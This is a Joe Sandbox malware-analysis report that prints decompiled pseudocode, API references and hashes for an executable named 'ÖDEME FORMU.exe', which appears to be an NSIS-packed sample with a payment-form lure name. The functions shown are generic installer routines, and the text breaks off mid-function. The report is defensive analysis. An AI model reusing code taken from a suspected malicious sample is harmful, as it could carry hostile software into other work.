Instruction ID: 388c8ae895ed4ea73890f6290ee17e3c52ce59555f833da3370ec015b8cfd073
Opcode Fuzzy Hash: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
Instruction Fuzzy Hash: CCE01235D0472066C628AB7CFE49E553B69AB053357640726F238F62F1C7789C428A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f50; // 0x6de9b4
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x42370c =  *0x42370c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x42370c, 0x7530,  *0x4236f4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
Instruction ID: 84a05c9b45cf4c5fa881fbb5f17894f913db592f6cd276ec9e0bf70eb6e0573e
Opcode Fuzzy Hash: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
Instruction Fuzzy Hash: 1E01F471B242119BE7294F789D05B2A36A8E710325F10823BFA55F66F1D67CDC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004057CB Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004057CB(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004057cf
0x004057dc
0x004057f1
0x004057f7

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,80000000,00000003), ref: 004057CF
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
Instruction ID: f93c687e1e26e3b8db63236639f9d4e14dddfc66631b4e0972b173020c912dad
Opcode Fuzzy Hash: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
Instruction Fuzzy Hash: 8DD09E31658201EFEF098F20DD16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004057AC Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057AC(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x004057b0
0x004057b9
0x004057c2
0x00000000
0x004057c2
0x004057c8

APIs

GetFileAttributesA.KERNELBASE(?,004055B7,?,?,?), ref: 004057B0
SetFileAttributesA.KERNELBASE(?,00000000), ref: 004057C2

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
Instruction ID: 1d3fe654247a7333bacfc0572c6a5cb341717cd3e61d1346c3f88923170604c5
Opcode Fuzzy Hash: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
Instruction Fuzzy Hash: 95C04C71818501EBD6015B24EF09C1F7F66EB50721B508B35F469E00F0C7359C66EA2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040327D Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040327D(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x00403281
0x00403294
0x0040329c
0x00000000
0x004032a3
0x00000000
0x004032a5

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413090,00000000,0040311B,00413090,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000), ref: 00403294

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
Instruction ID: fb6a36c91f62b4f1fc6c0be421fc724d0e407ee9a1d4d48bf35ddf6d218f7e68
Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
Instruction Fuzzy Hash: FAE08C32510219BBCF105E519C00EA73F6CEB093A2F008036F904E5190D238EA10DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004032AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}

0x004032bd
0x004032c3

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,00007DE4), ref: 004032BD

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404FDD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404FDD(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				struct HMENU__* _t89;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423704; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F71, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t89 = CreatePopupMenu();
							_push(0xffffffe1);
							_push(_t149);
							_t160 = _t89;
							AppendMenuA(_t160, _t149, 1, E00405B16(_t149, _t154, _t160));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420530;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x4236ec - _t149; // 0x7fffffff
						if(__eflags == 0) {
							ShowWindow( *0x423f24, 8);
							__eflags =  *0x423fac - _t149; // 0x0
							if(__eflags == 0) {
								E00404E9F( *((intOrPtr*)( *0x41fd00 + 0x34)), _t149);
							}
							E00403ECE(1);
							goto L25;
						}
						 *0x41f8f8 = 2;
						E00403ECE(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F5C(_a8, _a12, _a16);
						}
						ShowWindow( *0x4236f0, _t149);
						ShowWindow(_t154, 8);
						E00403F2A(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f28; // 0x6ddfd8
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x4236f0 = GetDlgItem(_a4, 0x403);
				 *0x4236e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423704 = _t127;
				_v8 = _t127;
				E00403F2A( *0x4236f0);
				 *0x4236f4 = E00404741(4);
				 *0x42370c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403EF5(_a4);
				if(( *0x423f30 & 0x00000003) != 0) {
					ShowWindow( *0x4236f0, _t149);
					if(( *0x423f30 & 0x00000002) != 0) {
						 *0x4236f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F2A( *0x4236e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f30 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404fe6
0x00404fec
0x00404ff5
0x00404ff8
0x00405189
0x00405190
0x004051b4
0x004051b4
0x004051ba
0x004051c7
0x004051e5
0x004051e5
0x004051ec
0x00405243
0x00405243
0x00405247
0x00000000
0x00000000
0x00405249
0x0040524c
0x00000000
0x00000000
0x00405256
0x0040525c
0x0040525e
0x00405261
0x0040535a
0x00000000
0x0040535a
0x00405267
0x0040526d
0x0040526f
0x00405270
0x0040527c
0x00405282
0x00405285
0x00405288
0x0040529d
0x004052a0
0x004052a0
0x004052a3
0x0040528a
0x0040528f
0x00405295
0x00405298
0x00405298
0x004052b3
0x004052bb
0x004052bc
0x004052be
0x004052c7
0x004052ca
0x004052d1
0x004052d8
0x004052e0
0x004052e0
0x004052ee
0x004052f4
0x004052f7
0x004052f7
0x004052fe
0x00405304
0x0040530d
0x00405314
0x0040531d
0x0040531f
0x00405322
0x00405331
0x00405333
0x00405339
0x0040533a
0x0040533b
0x0040533b
0x00405343
0x0040534e
0x00405354
0x00405354
0x00000000
0x004052be
0x004051ee
0x004051f4
0x00405224
0x00405226
0x0040522c
0x00405237
0x00405237
0x0040523e
0x00000000
0x0040523e
0x004051f8
0x00405202
0x00000000
0x004051c9
0x004051c9
0x004051cf
0x00405207
0x00000000
0x00405210
0x004051d8
0x004051dd
0x004051e0
0x00000000
0x004051e0
0x004051c7
0x00404ffe
0x00405002
0x0040500b
0x00405012
0x00405015
0x00405018
0x0040501b
0x0040501c
0x0040501d
0x00405036
0x00405039
0x00405043
0x00405052
0x0040505a
0x00405062
0x00405067
0x0040506a
0x00405076
0x0040507f
0x00405088
0x004050ab
0x004050b1
0x004050c2
0x004050c7
0x004050d5
0x004050e3
0x004050e3
0x004050e8
0x004050f6
0x004050f6
0x004050fb
0x004050fe
0x00405103
0x0040510f
0x00405118
0x00405125
0x00405134
0x00405127
0x0040512c
0x0040512c
0x00405140
0x00405140
0x00405154
0x0040515d
0x00405166
0x00405176
0x00405182
0x00405182
0x00000000

APIs

GetDlgItem.USER32 ref: 0040503C
GetDlgItem.USER32 ref: 0040504B
GetClientRect.USER32 ref: 00405088
GetSystemMetrics.USER32 ref: 00405090
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050B1
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050C2
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050D5
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050E3
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050F6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405118
ShowWindow.USER32(?,00000008), ref: 0040512C
GetDlgItem.USER32 ref: 0040514D
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040515D
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405176
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405182
GetDlgItem.USER32 ref: 0040505A

Part of subcall function 00403F2A: SendMessageA.USER32(00000028,?,00000001,00403D5B), ref: 00403F38

GetDlgItem.USER32 ref: 0040519F
CreateThread.KERNEL32 ref: 004051AD
CloseHandle.KERNEL32(00000000), ref: 004051B4
ShowWindow.USER32(00000000), ref: 004051D8
ShowWindow.USER32(00000000,00000008), ref: 004051DD
ShowWindow.USER32(00000008), ref: 00405224
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405256
CreatePopupMenu.USER32 ref: 00405267
AppendMenuA.USER32 ref: 0040527C
GetWindowRect.USER32 ref: 0040528F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052EE
OpenClipboard.USER32(00000000), ref: 004052FE
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405304
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040530D
GlobalLock.KERNEL32 ref: 00405317
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040532B
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405343
SetClipboardData.USER32(00000001,00000000), ref: 0040534E
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405354

Strings

{, xrefs: 00405243

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
Instruction ID: ce63edb53461e73d1802b3fb2e279853447b443b010abc9b5e4e8924112ec9d2
Opcode Fuzzy Hash: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
Instruction Fuzzy Hash: 0AA14A70900209BFDB219F60DD89EAE7F79FB08355F00817AFA05BA2A0C7795A41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004047EE Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E004047EE(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f48; // 0x6de184
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f28; // 0x6ddfd8
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f31 & 0x00000002;
							if(( *0x423f31 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E0040476E(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f30; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42050c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x420524;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42050c = _t315;
									 *0x420524 = _t315;
									 *0x423f80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f31 & 0x00000001;
										if(( *0x423f31 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f4c - _t315; // 0x2
										_v32 =  *0x420524;
										_t196 =  *0x423f48; // 0x6de184
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x4236fc; // 0x6df5dc
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040468C(0x3ff, 0xfffffffb, E00404741(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x6de18c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
